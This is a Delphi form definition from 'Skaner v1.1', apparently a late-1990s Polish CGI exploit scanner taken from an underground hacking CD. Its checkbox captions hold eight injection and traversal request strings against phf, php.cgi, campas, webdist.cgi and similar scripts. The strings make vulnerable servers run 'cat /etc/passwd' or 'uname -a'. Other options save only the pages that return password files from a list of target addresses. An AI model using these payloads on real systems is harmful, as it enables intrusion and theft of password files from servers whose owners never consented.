home *** CD-ROM | disk | FTP | other *** search
/ Underground / Underground CD1.iso / hack / progsy / inne / skaner / Skaner.exe / 0 / RCDATA / TSTARTWINDOW / TSTARTWINDOW.txt
Encoding:
Text File  |  1998-06-08  |  8.5 KB  |  401 lines

  1. object StartWindow: TStartWindow
  2.   Left = 254
  3.   Top = 179
  4.   BorderIcons = [biSystemMenu, biMinimize]
  5.   BorderStyle = bsSingle
  6.   Caption = 'Skaner v1.1'
  7.   ClientHeight = 341
  8.   ClientWidth = 737
  9.   Font.Charset = DEFAULT_CHARSET
  10.   Font.Color = clWindowText
  11.   Font.Height = -13
  12.   Font.Name = 'MS Sans Serif'
  13.   Font.Style = []
  14.   OnClose = FormClose
  15.   OnCreate = FormCreate
  16.   PixelsPerInch = 120
  17.   TextHeight = 16
  18.   object Panel1: TPanel
  19.     Left = 8
  20.     Top = 8
  21.     Width = 721
  22.     Height = 325
  23.     BevelInner = bvRaised
  24.     BevelOuter = bvLowered
  25.     TabOrder = 0
  26.     object GB1: TGroupBox
  27.       Left = 12
  28.       Top = 4
  29.       Width = 409
  30.       Height = 309
  31.       Caption = ' Wybierz jakie bugi chcesz sprawdzi∩┐╜ '
  32.       TabOrder = 0
  33.       object CheckBox1: TCheckBox
  34.         Left = 12
  35.         Top = 32
  36.         Width = 385
  37.         Height = 17
  38.         TabStop = False
  39.         Caption = '/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd'
  40.         TabOrder = 0
  41.       end
  42.       object CheckBox2: TCheckBox
  43.         Left = 12
  44.         Top = 52
  45.         Width = 385
  46.         Height = 17
  47.         TabStop = False
  48.         Caption = '/cgi-bin/php.cgi?/etc/passwd'
  49.         TabOrder = 1
  50.       end
  51.       object CheckBox3: TCheckBox
  52.         Left = 12
  53.         Top = 72
  54.         Width = 385
  55.         Height = 17
  56.         TabStop = False
  57.         Caption = '/cgi-bin/phf?Qalias=hell%0acat%20/etc/passwd%0a'
  58.         TabOrder = 2
  59.       end
  60.       object CheckBox4: TCheckBox
  61.         Left = 12
  62.         Top = 92
  63.         Width = 385
  64.         Height = 17
  65.         TabStop = False
  66.         Caption = '/cgi-bin/phf?Qalias=hell%0auname%20-a%0a'
  67.         TabOrder = 3
  68.       end
  69.       object CheckBox5: TCheckBox
  70.         Left = 12
  71.         Top = 112
  72.         Width = 385
  73.         Height = 17
  74.         TabStop = False
  75.         Caption = '/cgi-bin/handler/whatever;cat /etc/passwd| ?data=Download'
  76.         TabOrder = 4
  77.       end
  78.       object CheckBox6: TCheckBox
  79.         Left = 12
  80.         Top = 132
  81.         Width = 385
  82.         Height = 17
  83.         TabStop = False
  84.         Caption = '/cgi-bin/campas?%0acat%0a/etc/passwd%0a'
  85.         TabOrder = 5
  86.       end
  87.       object CheckBox7: TCheckBox
  88.         Left = 12
  89.         Top = 152
  90.         Width = 385
  91.         Height = 17
  92.         TabStop = False
  93.         Caption = '/cgi-bin/webdist.cgi?distloc=;cat%20/etc/passwd'
  94.         TabOrder = 6
  95.       end
  96.       object CheckBox8: TCheckBox
  97.         Left = 12
  98.         Top = 172
  99.         Width = 385
  100.         Height = 17
  101.         TabStop = False
  102.         Caption = '/cgi-bin/view-source?../../../../../../../etc/passwd'
  103.         TabOrder = 7
  104.       end
  105.       object Edit1: TEdit
  106.         Left = 32
  107.         Top = 196
  108.         Width = 365
  109.         Height = 24
  110.         TabStop = False
  111.         TabOrder = 8
  112.       end
  113.       object Edit2: TEdit
  114.         Left = 32
  115.         Top = 228
  116.         Width = 365
  117.         Height = 24
  118.         TabStop = False
  119.         TabOrder = 9
  120.       end
  121.       object CheckBox10: TCheckBox
  122.         Left = 12
  123.         Top = 232
  124.         Width = 17
  125.         Height = 17
  126.         TabStop = False
  127.         Caption = 'CheckBox10'
  128.         TabOrder = 10
  129.       end
  130.       object CheckBox9: TCheckBox
  131.         Left = 12
  132.         Top = 200
  133.         Width = 17
  134.         Height = 17
  135.         TabStop = False
  136.         Caption = 'CheckBox9'
  137.         TabOrder = 11
  138.       end
  139.       object CheckBox11: TCheckBox
  140.         Left = 12
  141.         Top = 264
  142.         Width = 17
  143.         Height = 17
  144.         TabOrder = 12
  145.       end
  146.       object Edit3: TEdit
  147.         Left = 32
  148.         Top = 260
  149.         Width = 365
  150.         Height = 24
  151.         TabOrder = 13
  152.       end
  153.     end
  154.     object GB2: TGroupBox
  155.       Left = 432
  156.       Top = 4
  157.       Width = 277
  158.       Height = 89
  159.       Caption = ' Plik z adresami '
  160.       TabOrder = 1
  161.       object LWybierzPlik: TLabel
  162.         Left = 12
  163.         Top = 60
  164.         Width = 253
  165.         Height = 16
  166.         AutoSize = False
  167.       end
  168.       object BWybierzPlik: TButton
  169.         Left = 12
  170.         Top = 20
  171.         Width = 121
  172.         Height = 29
  173.         Caption = 'Wybierz plik'
  174.         TabOrder = 0
  175.         TabStop = False
  176.         OnClick = BWybierzPlikClick
  177.       end
  178.     end
  179.     object GB4: TGroupBox
  180.       Left = 432
  181.       Top = 188
  182.       Width = 277
  183.       Height = 85
  184.       Caption = ' Kt∩┐╜re strony zapisa∩┐╜ '
  185.       TabOrder = 2
  186.       object RBZapiszWszystkie: TRadioButton
  187.         Left = 12
  188.         Top = 20
  189.         Width = 253
  190.         Height = 17
  191.         Caption = 'Zapisz wszystkie strony'
  192.         Checked = True
  193.         TabOrder = 0
  194.         TabStop = True
  195.       end
  196.       object RBZapiszWlasciwe: TRadioButton
  197.         Left = 12
  198.         Top = 40
  199.         Width = 253
  200.         Height = 17
  201.         Caption = 'Zapisz te, kt∩┐╜re nie zwr∩┐╜c∩┐╜ b∩┐╜∩┐╜du'
  202.         TabOrder = 1
  203.       end
  204.       object RBZapiszPasswd: TRadioButton
  205.         Left = 12
  206.         Top = 60
  207.         Width = 253
  208.         Height = 17
  209.         Caption = 'Zapisz tylko strony z passwd'
  210.         TabOrder = 2
  211.       end
  212.     end
  213.     object BSkanuj: TButton
  214.       Left = 432
  215.       Top = 284
  216.       Width = 133
  217.       Height = 29
  218.       Caption = 'Skanuj'
  219.       TabOrder = 3
  220.       TabStop = False
  221.       OnClick = BSkanujClick
  222.     end
  223.     object BZakoncz1: TButton
  224.       Left = 576
  225.       Top = 284
  226.       Width = 133
  227.       Height = 29
  228.       Caption = 'Zako∩┐╜cz'
  229.       TabOrder = 4
  230.       TabStop = False
  231.       OnClick = BZakoncz1Click
  232.     end
  233.     object RichEditIP: TRichEdit
  234.       Left = 420
  235.       Top = 248
  236.       Width = 13
  237.       Height = 25
  238.       TabOrder = 5
  239.       Visible = False
  240.       WordWrap = False
  241.     end
  242.     object GB3: TGroupBox
  243.       Left = 432
  244.       Top = 96
  245.       Width = 277
  246.       Height = 89
  247.       Caption = ' Katalog na strony '
  248.       TabOrder = 6
  249.       object LWybierzKatalog: TLabel
  250.         Left = 12
  251.         Top = 60
  252.         Width = 253
  253.         Height = 16
  254.         AutoSize = False
  255.       end
  256.       object BWybierzKatalog: TButton
  257.         Left = 12
  258.         Top = 20
  259.         Width = 121
  260.         Height = 29
  261.         Caption = 'Wybierz katalog'
  262.         TabOrder = 0
  263.         TabStop = False
  264.         OnClick = BWybierzKatalogClick
  265.       end
  266.     end
  267.     object RichEditFind: TRichEdit
  268.       Left = 708
  269.       Top = 244
  270.       Width = 13
  271.       Height = 25
  272.       TabOrder = 7
  273.       Visible = False
  274.       WordWrap = False
  275.     end
  276.   end
  277.   object Panel2: TPanel
  278.     Left = 8
  279.     Top = 8
  280.     Width = 721
  281.     Height = 325
  282.     BevelInner = bvRaised
  283.     BevelOuter = bvLowered
  284.     TabOrder = 1
  285.     object LNatalis: TLabel
  286.       Left = 28
  287.       Top = 292
  288.       Width = 133
  289.       Height = 16
  290.       AutoSize = False
  291.     end
  292.     object GB5: TGroupBox
  293.       Left = 12
  294.       Top = 4
  295.       Width = 697
  296.       Height = 233
  297.       Caption = ' Wyniki '
  298.       TabOrder = 0
  299.       object RichEdit: TRichEdit
  300.         Left = 12
  301.         Top = 20
  302.         Width = 673
  303.         Height = 201
  304.         HideScrollBars = False
  305.         ReadOnly = True
  306.         ScrollBars = ssVertical
  307.         TabOrder = 0
  308.         WordWrap = False
  309.       end
  310.     end
  311.     object BZakoncz2: TButton
  312.       Left = 588
  313.       Top = 288
  314.       Width = 121
  315.       Height = 29
  316.       Caption = 'Zako∩┐╜cz'
  317.       TabOrder = 1
  318.       OnClick = BZakoncz2Click
  319.     end
  320.     object Panel3: TPanel
  321.       Left = 12
  322.       Top = 248
  323.       Width = 697
  324.       Height = 29
  325.       BevelInner = bvRaised
  326.       BevelOuter = bvLowered
  327.       TabOrder = 2
  328.       object LStatus: TLabel
  329.         Left = 8
  330.         Top = 8
  331.         Width = 345
  332.         Height = 16
  333.         AutoSize = False
  334.       end
  335.       object LInfo: TLabel
  336.         Left = 364
  337.         Top = 8
  338.         Width = 325
  339.         Height = 16
  340.         AutoSize = False
  341.       end
  342.     end
  343.     object BOmin: TButton
  344.       Left = 192
  345.       Top = 288
  346.       Width = 121
  347.       Height = 29
  348.       Caption = 'Omi∩┐╜'
  349.       TabOrder = 3
  350.       Visible = False
  351.       OnClick = BOminClick
  352.     end
  353.     object BZapisz: TButton
  354.       Left = 456
  355.       Top = 288
  356.       Width = 121
  357.       Height = 29
  358.       Caption = 'Zapisz'
  359.       TabOrder = 4
  360.       OnClick = BZapiszClick
  361.     end
  362.     object BPrzerwij: TButton
  363.       Left = 324
  364.       Top = 288
  365.       Width = 121
  366.       Height = 29
  367.       Caption = 'Przerwij'
  368.       TabOrder = 5
  369.       OnClick = BPrzerwijClick
  370.     end
  371.   end
  372.   object OpenDialogPlik: TOpenDialog
  373.     Left = 552
  374.     Top = 28
  375.   end
  376.   object Http: THttpCli
  377.     ProxyPort = '80'
  378.     NoCache = False
  379.     ContentTypePost = 'application/x-www-form-urlencoded'
  380.     MultiThreaded = False
  381.     OnDocData = HttpDocData
  382.     Left = 584
  383.     Top = 28
  384.   end
  385.   object OpenDialogKatalog: TOpenDialog
  386.     FileName = 'none'
  387.     Left = 552
  388.     Top = 120
  389.   end
  390.   object SaveDialog: TSaveDialog
  391.     DefaultExt = 'txt'
  392.     Filter = 'Wszystkie pliki|*.*|Pliki tekstowe|*.txt'
  393.     Left = 564
  394.     Top = 292
  395.   end
  396.   object OnLineDetect: TOnLineDetect
  397.     Left = 616
  398.     Top = 28
  399.   end
  400. end
  401.